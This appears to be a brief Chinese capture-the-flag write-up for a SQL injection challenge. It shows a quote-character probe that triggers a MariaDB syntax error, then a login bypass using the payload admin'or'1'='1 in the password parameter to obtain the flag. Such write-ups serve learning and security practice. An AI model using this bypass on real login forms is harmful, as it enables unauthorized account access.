代码名称为 sql，对应sql注入漏洞。

我们输入 admin，admin 判断对应的输出。

对应测试在 admin 后添加 ?username=admin&password=admin'

得到回显 提示输入有错误

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''admin''' at line 1

sql 的目录是绕过 sql 注入语句，并执行我们想要的操作。

这里发现 ' 是可以输入的，尝试使用 ' 进行绕过。

?username=admin&password=admin'or'1'='1 通过 ' 跳出原始语句，并且执行 新的保证能执行。

得到 flag